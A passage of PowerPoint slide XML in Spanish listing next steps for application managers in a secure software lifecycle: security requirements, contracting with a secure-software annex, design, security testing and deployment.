            <a:r>
              <a:rPr lang="es-AR" noProof="0" dirty="0"/>
              <a:t>Próximos pasos para los Administradores de Aplicaciones</a:t>
            </a:r>
            <a:endParaRPr lang="es-AR" noProof="0" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Grupo 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43859D49-6095-4E31-B8CD-E0728C6501E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="158400" y="2324670"/>
            <a:ext cx="6424445" cy="7443865"/>
            <a:chOff x="158400" y="2262108"/>
            <a:chExt cx="6424445" cy="7443865"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="Forma libre: forma 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{257DEFA6-2437-4D46-BD11-7D989E59E6A4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1152537" y="2262108"/>
              <a:ext cx="5430308" cy="1052601"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 926552"/>
                <a:gd name="connsiteY0" fmla="*/ 154428 h 5430307"/>
                <a:gd name="connsiteX1" fmla="*/ 154428 w 926552"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 5430307"/>
                <a:gd name="connsiteX2" fmla="*/ 772124 w 926552"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 5430307"/>
                <a:gd name="connsiteX3" fmla="*/ 926552 w 926552"/>
                <a:gd name="connsiteY3" fmla="*/ 154428 h 5430307"/>
                <a:gd name="connsiteX4" fmla="*/ 926552 w 926552"/>
                <a:gd name="connsiteY4" fmla="*/ 5275879 h 5430307"/>
                <a:gd name="connsiteX5" fmla="*/ 772124 w 926552"/>
                <a:gd name="connsiteY5" fmla="*/ 5430307 h 5430307"/>
                <a:gd name="connsiteX6" fmla="*/ 154428 w 926552"/>
                <a:gd name="connsiteY6" fmla="*/ 5430307 h 5430307"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 926552"/>
                <a:gd name="connsiteY7" fmla="*/ 5275879 h 5430307"/>
                <a:gd name="connsiteX8" fmla="*/ 0 w 926552"/>
                <a:gd name="connsiteY8" fmla="*/ 154428 h 543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552" h="5430307">
                  <a:moveTo>
                    <a:pt x="900202" y="3"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="914755" y="3"/>
                    <a:pt x="926552" y="405216"/>
                    <a:pt x="926552" y="905069"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="926552" y="4525238"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="926552" y="5025091"/>
                    <a:pt x="914755" y="5430304"/>
                    <a:pt x="900202" y="5430304"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="26350" y="5430304"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="11797" y="5430304"/>
                    <a:pt x="0" y="5025091"/>
                    <a:pt x="0" y="4525238"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="905069"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="405216"/>
                    <a:pt x="11797" y="3"/>
                    <a:pt x="26350" y="3"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="900202" y="3"/>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9232" tIns="153231" rIns="81231" bIns="135232" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="171450" lvl="1" indent="-171450" defTabSz="444500">
                <a:spcBef>
                  <a:spcPts val="200"/>
                </a:spcBef>
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="es-AR" sz="84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Recolectar y negociar los requisitos de negocios para una aplicación, incluyendo confidencialidad, autenticidad, integridad y disponibilidad de todos los activos de datos y de las funciones de negocio.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="171450" lvl="1" indent="-171450" defTabSz="444500">
                <a:spcBef>
                  <a:spcPts val="200"/>
                </a:spcBef>
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="es-AR" sz="84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Recopilar los requerimientos técnicos incluyendo requerimientos de seguridad funcionales y no funcionales.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="171450" lvl="1" indent="-171450" defTabSz="444500">
                <a:spcBef>
                  <a:spcPts val="200"/>
                </a:spcBef>
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="es-AR" sz="84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Planear y negociar el presupuesto que cubre todos los aspectos de diseño, construcción, testeo y operación, incluyendo actividades de seguridad.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Forma libre: forma 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54D347D0-C49F-4493-A445-94630FE8BB0A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="158400" y="2262108"/>
              <a:ext cx="990000" cy="1052601"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 1115983"/>
                <a:gd name="connsiteY0" fmla="*/ 175437 h 1052601"/>
                <a:gd name="connsiteX1" fmla="*/ 175437 w 1115983"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 1052601"/>
                <a:gd name="connsiteX2" fmla="*/ 940546 w 1115983"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 1052601"/>
                <a:gd name="connsiteX3" fmla="*/ 1115983 w 1115983"/>
                <a:gd name="connsiteY3" fmla="*/ 175437 h 1052601"/>
                <a:gd name="connsiteX4" fmla="*/ 1115983 w 1115983"/>
                <a:gd name="connsiteY4" fmla="*/ 877164 h 1052601"/>
                <a:gd name="connsiteX5" fmla="*/ 940546 w 1115983"/>
                <a:gd name="connsiteY5" fmla="*/ 1052601 h 1052601"/>
                <a:gd name="connsiteX6" fmla="*/ 175437 w 1115983"/>
                <a:gd name="connsiteY6" fmla="*/ 1052601 h 1052601"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 1115983"/>
                <a:gd name="connsiteY7" fmla="*/ 877164 h 1052601"/>
                <a:gd name="connsiteX8" fmla="*/ 0 w 1115983"/>
                <a:gd name="connsiteY8" fmla="*/ 175437 h 105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983" h="1052601">
                  <a:moveTo>
                    <a:pt x="0" y="175437"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="78546"/>
                    <a:pt x="78546" y="0"/>
                    <a:pt x="175437" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="940546" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1037437" y="0"/>
                    <a:pt x="1115983" y="78546"/>
                    <a:pt x="1115983" y="175437"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1115983" y="877164"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1115983" y="974055"/>
                    <a:pt x="1037437" y="1052601"/>
                    <a:pt x="940546" y="1052601"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="175437" y="1052601"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="78546" y="1052601"/>
                    <a:pt x="0" y="974055"/>
                    <a:pt x="0" y="877164"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="175437"/>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3294" tIns="72339" rIns="93294" bIns="72339" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0" algn="ctr" defTabSz="466725">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Administra-ción de Requisitos y Recursos</a:t>
              </a:r>
              <a:endPar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Forma libre: forma 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FB65247-2DF6-4945-BD3F-A9036A74B1EC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1152537" y="3476028"/>
              <a:ext cx="5430307" cy="1179303"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 1121127"/>
                <a:gd name="connsiteY0" fmla="*/ 186858 h 5430307"/>
                <a:gd name="connsiteX1" fmla="*/ 186858 w 1121127"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 5430307"/>
                <a:gd name="connsiteX2" fmla="*/ 934269 w 1121127"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 5430307"/>
                <a:gd name="connsiteX3" fmla="*/ 1121127 w 1121127"/>
                <a:gd name="connsiteY3" fmla="*/ 186858 h 5430307"/>
                <a:gd name="connsiteX4" fmla="*/ 1121127 w 1121127"/>
                <a:gd name="connsiteY4" fmla="*/ 5243449 h 5430307"/>
                <a:gd name="connsiteX5" fmla="*/ 934269 w 1121127"/>
                <a:gd name="connsiteY5" fmla="*/ 5430307 h 5430307"/>
                <a:gd name="connsiteX6" fmla="*/ 186858 w 1121127"/>
                <a:gd name="connsiteY6" fmla="*/ 5430307 h 5430307"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 1121127"/>
                <a:gd name="connsiteY7" fmla="*/ 5243449 h 5430307"/>
                <a:gd name="connsiteX8" fmla="*/ 0 w 1121127"/>
                <a:gd name="connsiteY8" fmla="*/ 186858 h 543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127" h="5430307">
                  <a:moveTo>
                    <a:pt x="1082549" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1103855" y="0"/>
                    <a:pt x="1121127" y="405212"/>
                    <a:pt x="1121127" y="905068"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1121127" y="4525239"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1121127" y="5025095"/>
                    <a:pt x="1103855" y="5430307"/>
                    <a:pt x="1082549" y="5430307"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="38578" y="5430307"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="17272" y="5430307"/>
                    <a:pt x="0" y="5025095"/>
                    <a:pt x="0" y="4525239"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="905068"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="405212"/>
                    <a:pt x="17272" y="0"/>
                    <a:pt x="38578" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1082549" y="0"/>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8729" tIns="162729" rIns="90729" bIns="144729" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>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Negociar requisitos con desarrolladores internos y externos, incluyendo lineamientos y requerimientos de seguridad con respecto a su programa de seguridad. Por ej. SDLC, mejores prácticas.</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Evaluar el cumplimiento de todos los requerimientos técnicos, incluyendo las fases de planificación y diseño.</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Negociar todos los requerimientos técnicos incluyendo diseño, seguridad y acuerdos de nivel de servicio (SLA).</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Considerar usar plantillas y listas de comprobación, como el </a:t>
              </a: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hlinkClick r:id="rId4"/>
                </a:rPr>
                <a:t>Anexo de Contrato de Software Seguro</a:t>
              </a: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a:p>
              <a:pPr marL="0" lvl="1" defTabSz="444500">
                <a:spcBef>
                  <a:spcPts val="200"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="es-AR" sz="820" b="1"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Nota: </a:t>
              </a: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este anexo toma en cuenta las leyes de los EE.UU. y por lo tanto se recomienda realizar las consultas legales correspondientes a cada país antes de utilizarlo. </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Forma libre: forma 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99E3EA0F-BBA3-4D34-80C3-2A22CEF4D2D1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="158400" y="3476028"/>
              <a:ext cx="990000" cy="1179303"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 1115983"/>
                <a:gd name="connsiteY0" fmla="*/ 186001 h 1254976"/>
                <a:gd name="connsiteX1" fmla="*/ 186001 w 1115983"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 1254976"/>
                <a:gd name="connsiteX2" fmla="*/ 929982 w 1115983"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 1254976"/>
                <a:gd name="connsiteX3" fmla="*/ 1115983 w 1115983"/>
                <a:gd name="connsiteY3" fmla="*/ 186001 h 1254976"/>
                <a:gd name="connsiteX4" fmla="*/ 1115983 w 1115983"/>
                <a:gd name="connsiteY4" fmla="*/ 1068975 h 1254976"/>
                <a:gd name="connsiteX5" fmla="*/ 929982 w 1115983"/>
                <a:gd name="connsiteY5" fmla="*/ 1254976 h 1254976"/>
                <a:gd name="connsiteX6" fmla="*/ 186001 w 1115983"/>
                <a:gd name="connsiteY6" fmla="*/ 1254976 h 1254976"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 1115983"/>
                <a:gd name="connsiteY7" fmla="*/ 1068975 h 1254976"/>
                <a:gd name="connsiteX8" fmla="*/ 0 w 1115983"/>
                <a:gd name="connsiteY8" fmla="*/ 186001 h 125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983" h="1254976">
                  <a:moveTo>
                    <a:pt x="0" y="186001"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="83275"/>
                    <a:pt x="83275" y="0"/>
                    <a:pt x="186001" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="929982" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1032708" y="0"/>
                    <a:pt x="1115983" y="83275"/>
                    <a:pt x="1115983" y="186001"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1115983" y="1068975"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1115983" y="1171701"/>
                    <a:pt x="1032708" y="1254976"/>
                    <a:pt x="929982" y="1254976"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="186001" y="1254976"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="83275" y="1254976"/>
                    <a:pt x="0" y="1171701"/>
                    <a:pt x="0" y="1068975"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="1860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6388" tIns="75433" rIns="96388" bIns="75433" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0" algn="ctr" defTabSz="466725">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Solicitud de Propuestas (RFP) y Contrataciones</a:t>
              </a:r>
              <a:endPar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0" name="Forma libre: forma 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{069AD1FA-B99B-4D42-8055-FBA156E1233A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1152537" y="4818298"/>
              <a:ext cx="5430307" cy="1148078"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 1039867"/>
                <a:gd name="connsiteY0" fmla="*/ 173315 h 5430307"/>
                <a:gd name="connsiteX1" fmla="*/ 173315 w 1039867"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 5430307"/>
                <a:gd name="connsiteX2" fmla="*/ 866552 w 1039867"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 5430307"/>
                <a:gd name="connsiteX3" fmla="*/ 1039867 w 1039867"/>
                <a:gd name="connsiteY3" fmla="*/ 173315 h 5430307"/>
                <a:gd name="connsiteX4" fmla="*/ 1039867 w 1039867"/>
                <a:gd name="connsiteY4" fmla="*/ 5256992 h 5430307"/>
                <a:gd name="connsiteX5" fmla="*/ 866552 w 1039867"/>
                <a:gd name="connsiteY5" fmla="*/ 5430307 h 5430307"/>
                <a:gd name="connsiteX6" fmla="*/ 173315 w 1039867"/>
                <a:gd name="connsiteY6" fmla="*/ 5430307 h 5430307"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 1039867"/>
                <a:gd name="connsiteY7" fmla="*/ 5256992 h 5430307"/>
                <a:gd name="connsiteX8" fmla="*/ 0 w 1039867"/>
                <a:gd name="connsiteY8" fmla="*/ 173315 h 543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867" h="5430307">
                  <a:moveTo>
                    <a:pt x="1006678" y="3"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1025008" y="3"/>
                    <a:pt x="1039867" y="405218"/>
                    <a:pt x="1039867" y="905073"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1039867" y="4525234"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1039867" y="5025089"/>
                    <a:pt x="1025008" y="5430304"/>
                    <a:pt x="1006678" y="5430304"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="33189" y="5430304"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="14859" y="5430304"/>
                    <a:pt x="0" y="5025089"/>
                    <a:pt x="0" y="4525234"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="905073"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="405218"/>
                    <a:pt x="14859" y="3"/>
                    <a:pt x="33189" y="3"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1006678" y="3"/>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4762" tIns="158762" rIns="86762" bIns="140762" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>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Negociar la planificación y diseño con los desarrolladores, interesados internos y especialistas de seguridad.</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Definir la arquitectura de seguridad, controles y contramedidas adecuadas a las necesidades de protección y el nivel de amenazas planificado. Esto debería contar con el apoyo de especialistas en seguridad.</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Asegurar que el propietario de la aplicación acepta los riesgos remanentes o bien que provea recursos adicionales.</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En cada etapa (</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="es-AR" sz="820" i="1"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sprint</a:t>
              </a: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asegurar que se creen casos de uso con requisitos de seguridad y restricciones para requerimientos no funcionales</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US"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1" name="Forma libre: forma 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9902C065-9D79-477C-9D55-37A172D5B73C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="158400" y="4816650"/>
              <a:ext cx="990000" cy="1148078"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 1115983"/>
                <a:gd name="connsiteY0" fmla="*/ 186001 h 1256288"/>
                <a:gd name="connsiteX1" fmla="*/ 186001 w 1115983"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 1256288"/>
                <a:gd name="connsiteX2" fmla="*/ 929982 w 1115983"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 1256288"/>
                <a:gd name="connsiteX3" fmla="*/ 1115983 w 1115983"/>
                <a:gd name="connsiteY3" fmla="*/ 186001 h 1256288"/>
                <a:gd name="connsiteX4" fmla="*/ 1115983 w 1115983"/>
                <a:gd name="connsiteY4" fmla="*/ 1070287 h 1256288"/>
                <a:gd name="connsiteX5" fmla="*/ 929982 w 1115983"/>
                <a:gd name="connsiteY5" fmla="*/ 1256288 h 1256288"/>
                <a:gd name="connsiteX6" fmla="*/ 186001 w 1115983"/>
                <a:gd name="connsiteY6" fmla="*/ 1256288 h 1256288"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 1115983"/>
                <a:gd name="connsiteY7" fmla="*/ 1070287 h 1256288"/>
                <a:gd name="connsiteX8" fmla="*/ 0 w 1115983"/>
                <a:gd name="connsiteY8" fmla="*/ 186001 h 125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983" h="1256288">
                  <a:moveTo>
                    <a:pt x="0" y="186001"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="83275"/>
                    <a:pt x="83275" y="0"/>
                    <a:pt x="186001" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="929982" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1032708" y="0"/>
                    <a:pt x="1115983" y="83275"/>
                    <a:pt x="1115983" y="186001"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1115983" y="1070287"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1115983" y="1173013"/>
                    <a:pt x="1032708" y="1256288"/>
                    <a:pt x="929982" y="1256288"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="186001" y="1256288"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="83275" y="1256288"/>
                    <a:pt x="0" y="1173013"/>
                    <a:pt x="0" y="1070287"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="1860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6388" tIns="75433" rIns="96388" bIns="75433" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0" algn="ctr" defTabSz="466725">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="35000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Planifica-ción y </a:t>
              </a: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Diseño</a:t>
              </a:r>
              <a:endParaRPr lang="es-AR" sz="100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Forma libre: forma 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D5CCB08-EFB7-4BF6-B1A8-54E1426F1BF6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1152537" y="6126047"/>
              <a:ext cx="5425004" cy="1476359"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 1476358"/>
                <a:gd name="connsiteY0" fmla="*/ 246065 h 5425004"/>
                <a:gd name="connsiteX1" fmla="*/ 246065 w 1476358"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 5425004"/>
                <a:gd name="connsiteX2" fmla="*/ 1230293 w 1476358"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 5425004"/>
                <a:gd name="connsiteX3" fmla="*/ 1476358 w 1476358"/>
                <a:gd name="connsiteY3" fmla="*/ 246065 h 5425004"/>
                <a:gd name="connsiteX4" fmla="*/ 1476358 w 1476358"/>
                <a:gd name="connsiteY4" fmla="*/ 5178939 h 5425004"/>
                <a:gd name="connsiteX5" fmla="*/ 1230293 w 1476358"/>
                <a:gd name="connsiteY5" fmla="*/ 5425004 h 5425004"/>
                <a:gd name="connsiteX6" fmla="*/ 246065 w 1476358"/>
                <a:gd name="connsiteY6" fmla="*/ 5425004 h 5425004"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 1476358"/>
                <a:gd name="connsiteY7" fmla="*/ 5178939 h 5425004"/>
                <a:gd name="connsiteX8" fmla="*/ 0 w 1476358"/>
                <a:gd name="connsiteY8" fmla="*/ 246065 h 5425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358" h="5425004">
                  <a:moveTo>
                    <a:pt x="1409394" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1446377" y="0"/>
                    <a:pt x="1476358" y="404818"/>
                    <a:pt x="1476358" y="904187"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1476358" y="4520817"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1476358" y="5020186"/>
                    <a:pt x="1446377" y="5425004"/>
                    <a:pt x="1409394" y="5425004"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="66964" y="5425004"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="29981" y="5425004"/>
                    <a:pt x="0" y="5020186"/>
                    <a:pt x="0" y="4520817"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="904187"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="404818"/>
                    <a:pt x="29981" y="0"/>
                    <a:pt x="66964" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1409394" y="0"/>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6070" tIns="180071" rIns="108070" bIns="162070" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>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Automatizar el despliegue seguro de la aplicación, interfaces y todo componente, incluyendo las autorizaciones requeridas.</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Probar las funciones técnicas, integración a la arquitectura de TI, y coordinar pruebas de funciones de negocio.</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Crear casos de “uso” y de “abuso” tanto desde el punto de vista netamente técnico como del negocio.</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Administrar pruebas de seguridad de acuerdo a los procesos internos, las necesidades de protección y el nivel de amenazas asumido para la aplicación.</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Poner la aplicación en operación y migrar las aplicaciones usadas previamente en caso de ser necesario.</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Actualizar toda la documentación, incluyendo la Base de Datos de Gestión de la Seguridad (CMDB) y la arquitectura de seguridad</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US"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orma libre: forma 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF62F0DD-518B-49EA-824C-D6C3FD27C4F0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="158400" y="6126047"/>
              <a:ext cx="990000" cy="1508711"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 1114893"/>
                <a:gd name="connsiteY0" fmla="*/ 185819 h 1541065"/>
                <a:gd name="connsiteX1" fmla="*/ 185819 w 1114893"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 1541065"/>
                <a:gd name="connsiteX2" fmla="*/ 929074 w 1114893"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 1541065"/>
                <a:gd name="connsiteX3" fmla="*/ 1114893 w 1114893"/>
                <a:gd name="connsiteY3" fmla="*/ 185819 h 1541065"/>
                <a:gd name="connsiteX4" fmla="*/ 1114893 w 1114893"/>
                <a:gd name="connsiteY4" fmla="*/ 1355246 h 1541065"/>
                <a:gd name="connsiteX5" fmla="*/ 929074 w 1114893"/>
                <a:gd name="connsiteY5" fmla="*/ 1541065 h 1541065"/>
                <a:gd name="connsiteX6" fmla="*/ 185819 w 1114893"/>
